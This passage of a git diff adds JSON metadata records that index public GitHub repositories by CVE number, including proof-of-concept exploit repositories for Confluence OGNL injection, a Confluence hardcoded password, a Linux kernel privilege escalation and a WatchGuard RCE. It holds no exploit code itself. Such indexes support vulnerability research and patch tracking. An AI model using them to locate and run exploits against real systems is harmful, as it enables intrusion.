"2023-01-19T23:43:17Z", + "pushed_at": "2023-01-15T20:14:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 597319077, + "name": "CVE-2022-26134_Behinder_MemShell", + "full_name": "MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell", + "owner": { + "login": "MaskCyberSecurityTeam", + "id": 107802263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107802263?v=4", + "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell", + "description": null, + "fork": false, + "created_at": "2023-02-04T06:51:47Z", + "updated_at": "2024-01-12T09:31:33Z", + "pushed_at": "2023-02-04T07:18:25Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 672663443, + "name": "Atlassian_CVE-2022-26134", + "full_name": "Muhammad-Ali007\/Atlassian_CVE-2022-26134", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Atlassian_CVE-2022-26134", + "description": "Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)", + "fork": false, + "created_at": "2023-07-30T20:56:13Z", + "updated_at": "2023-08-03T21:18:52Z", + "pushed_at": "2023-08-03T21:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 694339159, + "name": "CVE-2022-26134", + "full_name": "acfirthh\/CVE-2022-26134", + "owner": { + "login": "acfirthh", + "id": 59393271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59393271?v=4", + "html_url": "https:\/\/github.com\/acfirthh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acfirthh\/CVE-2022-26134", + "description": "A PoC for CVE-2022-26134 for Educational Purposes and Security Research", + "fork": false, + "created_at": "2023-09-20T19:54:05Z", + "updated_at": "2024-07-15T15:33:52Z", + "pushed_at": "2023-09-20T20:08:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "cybersecurity-education", + "research", + "security-research", + "tryhackme" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707572955, + "name": "CVE-2022-26134", + "full_name": "yTxZx\/CVE-2022-26134", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yTxZx\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2023-10-20T07:42:36Z", + "updated_at": "2023-10-20T07:43:08Z", + "pushed_at": "2023-10-20T08:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736886495, + "name": "-CVE-2022-26134", + "full_name": "DARKSTUFF-LAB\/-CVE-2022-26134", + "owner": { + "login": "DARKSTUFF-LAB", + "id": 109729013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109729013?v=4", + "html_url": "https:\/\/github.com\/DARKSTUFF-LAB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DARKSTUFF-LAB\/-CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2023-12-29T06:51:38Z", + "updated_at": "2023-12-29T06:51:51Z", + "pushed_at": "2023-12-29T06:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777796929, + "name": "CVE-2022-26134-POC", + "full_name": "404fu\/CVE-2022-26134-POC", + "owner": { + "login": "404fu", + "id": 144592414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144592414?v=4", + "html_url": "https:\/\/github.com\/404fu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/404fu\/CVE-2022-26134-POC", + "description": null, + "fork": false, + "created_at": "2024-03-26T14:18:17Z", + "updated_at": "2024-03-26T14:43:14Z", + "pushed_at": "2024-03-26T14:34:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795180088, + "name": "CVE-2022-26134", + "full_name": "xsxtw\/CVE-2022-26134", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2024-05-02T18:31:54Z", + "updated_at": "2024-05-02T18:33:42Z", + "pushed_at": "2024-05-02T18:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807402056, + "name": "Confluence-RCE", + "full_name": "BBD-YZZ\/Confluence-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE", + "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)", + "fork": false, + "created_at": "2024-05-29T03:20:22Z", + "updated_at": "2024-09-22T06:25:09Z", + "pushed_at": "2024-08-26T09:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812067894, + "name": "CVE-2022-26134", + "full_name": "cc3305\/CVE-2022-26134", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-26134", + "description": "CVE-2022-26134 exploit script", + "fork": false, + "created_at": "2024-06-07T22:15:48Z", + "updated_at": "2024-07-27T20:17:27Z", + "pushed_at": "2024-07-27T20:17:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871981798, + "name": "CVE-2022-26134", + "full_name": "Agentgilspy\/CVE-2022-26134", + "owner": { + "login": "Agentgilspy", + "id": 67920312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67920312?v=4", + "html_url": "https:\/\/github.com\/Agentgilspy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Agentgilspy\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2024-10-13T13:38:07Z", + "updated_at": "2024-11-17T11:19:13Z", + "pushed_at": "2024-11-17T11:19:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892944519, + "name": "cve-2022-26134-poc", + "full_name": "XiaomingX\/cve-2022-26134-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2022-26134-poc", + "description": "CVE-2022-26134 是一个影响 Atlassian Confluence Server 和 Data Center 的 远程代码执行漏洞(RCE),其成因是服务器处理 OGNL 表达式时未能正确过滤输入,从而允许攻击者以特权账户权限执行任意代码。", + "fork": false, + "created_at": "2024-11-23T05:35:59Z", + "updated_at": "2024-12-08T18:36:58Z", + "pushed_at": "2024-11-23T05:38:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26135.json b/2022/CVE-2022-26135.json index 13034dc02c..64f210f653 100644 --- a/2022/CVE-2022-26135.json +++ b/2022/CVE-2022-26135.json @@ -34,5 +34,36 @@ "watchers": 87, "score": 0, "subscribers_count": 6 + }, + { + "id": 511445168, + "name": "CVE-2022-26135", + "full_name": "safe3s\/CVE-2022-26135", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-26135", + "description": " CVE-2022-26135 ", + "fork": false, + "created_at": "2022-07-07T08:28:02Z", + "updated_at": "2022-10-13T02:53:07Z", + "pushed_at": "2022-07-12T16:36:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26138.json b/2022/CVE-2022-26138.json new file mode 100644 index 0000000000..4ece865ccc --- /dev/null +++ b/2022/CVE-2022-26138.json @@ -0,0 +1,132 @@ +[ + { + "id": 516306618, + "name": "CVE-2022-26138", + "full_name": "alcaparra\/CVE-2022-26138", + "owner": { + "login": "alcaparra", + "id": 105424007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105424007?v=4", + "html_url": "https:\/\/github.com\/alcaparra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alcaparra\/CVE-2022-26138", + "description": "Atlassian Questions Hardcoded Password (CVE-2022-26138)", + "fork": false, + "created_at": "2022-07-21T09:28:06Z", + "updated_at": "2024-08-12T20:25:17Z", + "pushed_at": "2022-07-26T12:06:14Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "cve", + "cve-2022-26138", + "poc" + ], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518788417, + "name": "Confluence-Question-CVE-2022-26138-", + "full_name": "Vulnmachines\/Confluence-Question-CVE-2022-26138-", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Confluence-Question-CVE-2022-26138-", + "description": "Atlassian Confluence Server and Data Center: CVE-2022-26138", + "fork": false, + "created_at": "2022-07-28T09:48:21Z", + "updated_at": "2024-08-12T20:25:34Z", + "pushed_at": "2022-07-28T09:59:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 519447006, + "name": "CVE-2022-26138", + "full_name": "z92g\/CVE-2022-26138", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-26138", + "description": "Confluence Hardcoded Password POC", + "fork": false, + "created_at": "2022-07-30T07:14:52Z", + "updated_at": "2024-11-16T19:52:33Z", + "pushed_at": "2022-07-30T08:00:43Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531330961, + "name": "CVE-2022-26138", + "full_name": "shavchen\/CVE-2022-26138", + "owner": { + "login": "shavchen", + "id": 34539839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34539839?v=4", + "html_url": "https:\/\/github.com\/shavchen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shavchen\/CVE-2022-26138", + "description": null, + "fork": false, + "created_at": "2022-09-01T02:16:15Z", + "updated_at": "2022-09-23T14:42:23Z", + "pushed_at": "2022-07-22T06:42:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26265.json b/2022/CVE-2022-26265.json new file mode 100644 index 0000000000..7244bcd542 --- /dev/null +++ b/2022/CVE-2022-26265.json @@ -0,0 +1,71 @@ +[ + { + "id": 573201113, + "name": "CVE-2022-26265", + "full_name": "Inplex-sys\/CVE-2022-26265", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-26265", + "description": "The first proof of concept of the Contao CMS RCE", + "fork": false, + "created_at": "2022-12-01T23:11:19Z", + "updated_at": "2023-04-11T15:59:29Z", + "pushed_at": "2022-12-03T11:58:30Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "contao-cms", + "contao-exploit", + "cve", + "exploit", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623880121, + "name": "CVE-2022-26265", + "full_name": "redteamsecurity2023\/CVE-2022-26265", + "owner": { + "login": "redteamsecurity2023", + "id": 129942969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129942969?v=4", + "html_url": "https:\/\/github.com\/redteamsecurity2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteamsecurity2023\/CVE-2022-26265", + "description": "The first proof of concept of the Contao CMS RCE", + "fork": false, + "created_at": "2023-04-05T09:34:29Z", + "updated_at": "2023-04-05T09:37:01Z", + "pushed_at": "2023-04-05T09:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26318.json b/2022/CVE-2022-26318.json index c2af25f4ec..f13b775ed5 100644 --- a/2022/CVE-2022-26318.json +++ b/2022/CVE-2022-26318.json @@ -1,4 +1,35 @@ [ + { + "id": 474960129, + "name": "watchguard_cve-2022-26318", + "full_name": "misterxid\/watchguard_cve-2022-26318", + "owner": { + "login": "misterxid", + "id": 44462886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44462886?v=4", + "html_url": "https:\/\/github.com\/misterxid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/misterxid\/watchguard_cve-2022-26318", + "description": null, + "fork": false, + "created_at": "2022-03-28T10:53:38Z", + "updated_at": "2024-10-13T21:22:11Z", + "pushed_at": "2022-03-28T10:55:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, { "id": 482892577, "name": "Watchguard-RCE-POC-CVE-2022-26318", @@ -60,5 +91,36 @@ "watchers": 2, "score": 0, "subscribers_count": 1 + }, + { + "id": 898928788, + "name": "Watchguard-RCE-POC-CVE-2022-26318", + "full_name": "egilas\/Watchguard-RCE-POC-CVE-2022-26318", + "owner": { + "login": "egilas", + "id": 14824771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14824771?v=4", + "html_url": "https:\/\/github.com\/egilas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/egilas\/Watchguard-RCE-POC-CVE-2022-26318", + "description": "PoC for Watchguard CVE-2022-26318 updated to Python3.12", + "fork": false, + "created_at": "2024-12-05T09:56:57Z", + "updated_at": "2024-12-21T15:37:08Z", + "pushed_at": "2024-12-05T10:00:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26377.json b/2022/CVE-2022-26377.json new file mode 100644 index 0000000000..876afc0851 --- /dev/null +++ b/2022/CVE-2022-26377.json @@ -0,0 +1,33 @@ +[ + { + "id": 785525373, + "name": "ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "full_name": "watchtowrlabs\/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "description": null, + "fork": false, + "created_at": "2024-04-12T03:59:03Z", + "updated_at": "2024-06-27T09:27:36Z", + "pushed_at": "2024-04-12T04:05:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2639.json b/2022/CVE-2022-2639.json new file mode 100644 index 0000000000..7e7991dcb6 --- /dev/null +++ b/2022/CVE-2022-2639.json @@ -0,0 +1,126 @@ +[ + { + "id": 532959565, + "name": "CVE-2022-2639-PipeVersion", + "full_name": "bb33bb\/CVE-2022-2639-PipeVersion", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-2639-PipeVersion", + "description": "CVE-2022-2639 Linux kernel openvswitch local privilege escalation", + "fork": false, + "created_at": "2022-09-05T15:31:56Z", + "updated_at": "2024-10-27T23:14:05Z", + "pushed_at": "2022-09-05T14:25:17Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 108, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 557306150, + "name": "Detection-and-Mitigation-for-CVE-2022-2639", + "full_name": "EkamSinghWalia\/Detection-and-Mitigation-for-CVE-2022-2639", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-and-Mitigation-for-CVE-2022-2639", + "description": null, + "fork": false, + "created_at": "2022-10-25T12:59:31Z", + "updated_at": "2022-11-11T16:24:32Z", + "pushed_at": "2022-10-25T13:07:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752952146, + "name": "-2022-LOCALROOT-CVE-2022-2639", + "full_name": "letsr00t\/-2022-LOCALROOT-CVE-2022-2639", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/-2022-LOCALROOT-CVE-2022-2639", + "description": null, + "fork": false, + "created_at": "2024-02-05T07:10:51Z", + "updated_at": "2024-02-05T07:10:51Z", + "pushed_at": "2024-02-05T07:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879447823, + "name": "CVE-2022-2639-PipeVersion", + "full_name": "devetop\/CVE-2022-2639-PipeVersion", + "owner": { + "login": "devetop", + "id": 62440997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62440997?v=4", + "html_url": "https:\/\/github.com\/devetop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devetop\/CVE-2022-2639-PipeVersion", + "description": null, + "fork": false, + "created_at": "2024-10-27T23:14:48Z", + "updated_at": "2024-10-27T23:15:41Z", + "pushed_at": "2024-10-27T23:32:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26485.json b/2022/CVE-2022-26485.json new file mode 100644 index 0000000000..5d6c4e1554 --- /dev/null +++ b/2022/CVE-2022-26485.json @@ -0,0 +1,33 @@ +[ + { + "id": 595523904, + "name": "CVE-2022-26485", + "full_name": "mistymntncop\/CVE-2022-26485", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-26485", + "description": null, + "fork": false, + "created_at": "2023-01-31T09:01:17Z", + "updated_at": "2024-09-26T14:02:41Z", + "pushed_at": "2023-01-31T09:10:21Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 19, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26488.json b/2022/CVE-2022-26488.json new file mode 100644 index 0000000000..b5c433bc98 --- /dev/null +++ b/2022/CVE-2022-26488.json @@ -0,0 +1,33 @@ +[ + { + "id": 633237667, + "name": "PyPATHPwner", + "full_name": "techspence\/PyPATHPwner", + "owner": { + "login": "techspence", + "id": 7014376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7014376?v=4", + "html_url": "https:\/\/github.com\/techspence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/techspence\/PyPATHPwner", + "description": "POC Exploit for CVE-2022-26488 - Python for Windows (CPython) escalation of privilege vulnerability, discovered by the Lockheed Martin Red Team.", + "fork": false, + "created_at": "2023-04-27T04:30:29Z", + "updated_at": "2023-08-17T16:20:03Z", + "pushed_at": "2023-04-27T04:35:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26503.json b/2022/CVE-2022-26503.json new file mode 100644 index 0000000000..1e8b69b438 --- /dev/null +++ b/2022/CVE-2022-26503.json @@ -0,0 +1,33 @@ +[ + { + "id": 470522813, + "name": "CVE-2022-26503", + "full_name": "sinsinology\/CVE-2022-26503", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2022-26503", + "description": null, + "fork": false, + "created_at": "2022-03-16T09:54:16Z", + "updated_at": "2024-10-12T16:14:32Z", + "pushed_at": "2022-03-16T10:06:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26629.json b/2022/CVE-2022-26629.json new file mode 100644 index 0000000000..f387402cae --- /dev/null +++ b/2022/CVE-2022-26629.json @@ -0,0 +1,64 @@ +[ + { + "id": 473891141, + "name": "CVE-2022-26629", + "full_name": "scopion\/CVE-2022-26629", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2022-26629", + "description": null, + "fork": false, + "created_at": "2022-03-25T06:16:09Z", + "updated_at": "2022-03-26T06:05:07Z", + "pushed_at": "2022-03-25T05:14:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 474258525, + "name": "CVE-2022-26629", + "full_name": "sysenter-eip\/CVE-2022-26629", + "owner": { + "login": "sysenter-eip", + "id": 94691823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94691823?v=4", + "html_url": "https:\/\/github.com\/sysenter-eip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sysenter-eip\/CVE-2022-26629", + "description": null, + "fork": false, + "created_at": "2022-03-26T06:06:05Z", + "updated_at": "2022-03-26T06:09:21Z", + "pushed_at": "2022-03-26T06:09:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26763.json b/2022/CVE-2022-26763.json new file mode 100644 index 0000000000..169f38d8da --- /dev/null +++ b/2022/CVE-2022-26763.json @@ -0,0 +1,33 @@ +[ + { + "id": 509675215, + "name": "PCICrash", + "full_name": "zhuowei\/PCICrash", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/PCICrash", + "description": "PCIDriverKit proof-of-concept for CVE-2022-26763", + "fork": false, + "created_at": "2022-07-02T06:15:29Z", + "updated_at": "2023-09-10T07:56:41Z", + "pushed_at": "2022-07-02T06:15:40Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + 